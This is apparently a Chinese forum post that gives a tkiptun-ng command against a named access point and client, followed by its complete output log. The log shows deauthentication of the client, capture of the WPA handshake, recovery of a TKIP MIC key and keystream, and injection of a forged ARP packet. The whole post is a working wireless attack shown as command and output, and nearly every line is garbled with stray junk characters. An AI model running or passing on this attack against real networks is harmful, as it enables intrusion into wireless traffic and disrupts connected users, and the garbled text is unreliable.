中尉
- 注册时间
- 2009-5-13
- 金币
- 584 个
- 威望
- 2 个
- 荣誉
- 0 个
尚未签到
|
Input: 输入9 o! u$ l) k. F) E. Q1 v
$ W; [4 x$ S* H4 h# G, z+ w' W( X" e$ H
! o5 E Q# N1 N6 L8 J* n% z
tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0
# ]" R& B# ]6 d) f; ~6 n
. @ j X. j, A1 G4 ROutput: 输出
0 k8 M! R* j# P* u3 A: C
5 j3 w3 V9 Y2 k: p3 l( i The interface MAC (00:0E:2E:C5:813) doesn't match the specified MAC (-h).6 A: ` H {$ S5 a! f% U2 A
ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D" m# q7 P) ]" Q0 q
Blub 2:38 E6 38 1C 24 15 1C CF 7 y- [% Q8 b7 ~ t6 k# _0 n
Blub 1:17 DD 0D 69 1D C3 1F EE - r/ J# M3 a: u& @1 _
Blub 3:29 31 79 E7 E6 CF 8D 5E ) m/ g( L m& V
15:06:48 Michael Test: Successful
3 h8 @: a( V" s/ \) O 15:06:48 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
! y$ a" R/ f1 d" x% ^& V( e 15:06:48 Found specified AP; @9 S" a. L! T9 c
15:06:48 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]
0 L% e, ^9 t% L* l$ { 15:06:54 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]/ ]' e& z2 {$ V. u( K
15:06:56 WPA handshake: 00:14:6C:7E:40:80 captured" j, W" ]0 a( K2 N( d, c
15:06:56 Waiting for an ARP packet coming from the Client...
2 x( d8 i: a, s- ^ Saving chosen packet in replay_src-0305-150705.cap
6 D% E1 W7 v# s$ @* F) g+ Q 15:07:05 Waiting for an ARP response packet coming from the AP...5 O- y+ Y, o! \; Q7 d# z
Saving chosen packet in replay_src-0305-150705.cap
! c% ^. k% d; \2 ^) [1 ~ 15:07:05 Got the answer!; G, {8 N6 [2 }0 k& }! b1 Q$ P
15:07:05 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.
: a9 u& Q% X; V
. M2 M# \( D- e& n2 R" @* f 15:07:25 Offset 99 ( 0% done) | xor = B3 | pt = D3 | 103 frames written in 84468ms3 E @4 B" j8 K, e% U- @3 w
15:08:32 Offset 98 ( 1% done) | xor = AE | pt = 80 | 64 frames written in 52489ms
Z, Y: z' \* _" S+ K9 r% w u 15:09:45 Offset 97 ( 3% done) | xor = DE | pt = C8 | 131 frames written in 107407ms4 l( v1 s+ V6 F% q! l- S! w
15:11:05 Offset 96 ( 5% done) | xor = 5A | pt = 7A | 191 frames written in 156619ms! o" k5 j" b7 O- u. u
15:12:07 Offset 95 ( 6% done) | xor = 27 | pt = 02 | 21 frames written in 17221ms
: b* ~* U$ n& i' y0 z" ^, y 15:13:11 Offset 94 ( 8% done) | xor = D8 | pt = AB | 41 frames written in 33625ms' W) A& @7 y+ _5 _2 f$ C- d, P
15:14:12 Offset 93 (10% done) | xor = 94 | pt = 62 | 13 frames written in 10666ms
1 b! T2 Q+ M% U7 V# O 15:15:24 Offset 92 (11% done) | xor = DF | pt = 68 | 112 frames written in 91829ms/ V1 n% @* q2 \0 B, P/ \
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
* k0 ]( T, F2 l9 ]& L a 15:18:13 Offset 91 (13% done) | xor = A1 | pt = E1 | 477 frames written in 391139ms
0 M5 P( H3 D: R9 G1 q+ T! r, [& r; Y5 ? 15:19:32 Offset 90 (15% done) | xor = 5F | pt = B2 | 186 frames written in 152520ms' T$ n, z# _2 u1 b+ v8 A3 e# u
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
8 d) c1 g. n: j: K$ V/ q# G/ \/ E 15:22:09 Offset 89 (16% done) | xor = 9C | pt = 77 | 360 frames written in 295200ms- N$ a$ l# N0 q8 V
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.& x. w4 \: l) |+ F
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
g7 F# D6 @: r( K8 P( I 15:26:10 Offset 88 (18% done) | xor = 0D | pt = 3E | 598 frames written in 490361ms3 ]& t& j' u0 i+ Y9 ]8 e6 R. u
15:27:33 Offset 87 (20% done) | xor = 8C | pt = 00 | 230 frames written in 188603ms6 k" Z0 I0 q5 g- L- q: {
15:28:38 Offset 86 (21% done) | xor = 67 | pt = 00 | 47 frames written in 38537ms5 e6 u) u* G8 Z `; m
15:29:53 Offset 85 (23% done) | xor = AD | pt = 00 | 146 frames written in 119720ms1 g# U& e" J8 Q- E( V% z
15:31:16 Offset 84 (25% done) | xor = A3 | pt = 00 | 220 frames written in 180401ms
8 d" m# V) B7 m, \0 r 15:32:23 Offset 83 (26% done) | xor = 28 | pt = 00 | 75 frames written in 61499ms1 s& p" l% t+ j+ P: s
15:33:38 Offset 82 (28% done) | xor = 7C | pt = 00 | 141 frames written in 115619ms- V: Z6 o; n% {5 F
15:34:40 Offset 81 (30% done) | xor = 02 | pt = 00 | 19 frames written in 15584ms
- F( e/ _9 X; J6 ]+ [ 15:35:57 Offset 80 (31% done) | xor = C9 | pt = 00 | 171 frames written in 140221ms- G: { N I- Y* u# b0 \
15:37:13 Offset 79 (33% done) | xor = 38 | pt = 00 | 148 frames written in 121364ms
9 R& W }, N0 y4 X 15:38:21 Offset 78 (35% done) | xor = 71 | pt = 00 | 84 frames written in 68872ms
9 Y1 V+ O; J) C2 m7 E9 H9 U7 Q" k1 J Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
6 d( b8 e. P! p! e A0 m% k 15:40:55 Offset 77 (36% done) | xor = 8E | pt = 00 | 328 frames written in 268974ms
6 m$ k. H7 X3 k2 V$ A; {. P Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
$ b! C; }2 P; t6 q8 o: r 15:43:31 Offset 76 (38% done) | xor = 38 | pt = 00 | 355 frames written in 291086ms, y! \ @! M' r9 F3 l- ]& {6 z
15:44:37 Offset 75 (40% done) | xor = 79 | pt = 00 | 61 frames written in 50021ms: t A2 ?. J, k
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.2 |1 G" G! x: h* O+ l1 w( h
15:47:05 Offset 74 (41% done) | xor = 59 | pt = 00 | 269 frames written in 220581ms
u0 y0 {' D$ X# f 15:48:30 Offset 73 (43% done) | xor = 14 | pt = 00 | 249 frames written in 204178ms
: ~ b7 C6 o0 |8 U, n+ D- v 15:49:49 Offset 72 (45% done) | xor = 9A | pt = 00 | 183 frames written in 150059ms
/ x* a( [1 Z. n# l Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
) s @- X2 k+ q 15:52:32 Offset 71 (46% done) | xor = 03 | pt = 00 | 420 frames written in 344400ms( t/ w) S ~; R2 h4 Z# ?" R* M2 R
15:53:57 Offset 70 (48% done) | xor = 0E | pt = 00 | 239 frames written in 195980ms
! T# h( M) B6 H% X: V$ K" p Sleeping for 60 seconds.36 bytes still unknown
7 |0 L& i [1 ?' F3 x' B ARP Reply) @5 h+ X1 J- O0 @; T
Checking 192.168.x.y
1 N0 |3 o" |5 Z" D9 t6 W; h 15:54:11 Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:663 }% u# i6 G" Q' j
4 Q; D) d0 X7 \0 e- v4 `2 l5 Z$ H5 K Saving plaintext in replay_dec-0305-155411.cap
; j! s1 d% C3 X& b& n* I% t4 i Saving keystream in replay_dec-0305-155411.xor
! a. e W. t; w4 j 15:54:11 ; R! e& X2 a- I2 d7 v
Completed in 2816s (0.02 bytes/s)
$ h6 B7 k9 H; ~ 6 {8 I; {3 T& N. q1 [' K3 n
15:54:11 AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42, Y6 t M1 P5 _ y$ s3 j" c
15:54:11 Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.112
* i$ V$ H) U. A$ ~+ @4 e- d1 i, b 15:54:11 Sent encrypted tkip ARP request to the client.; L& c* {# T. e b6 a$ |5 \) a
15:54:11 Wait for the mic countermeasure timeout of 60 seconds. |
|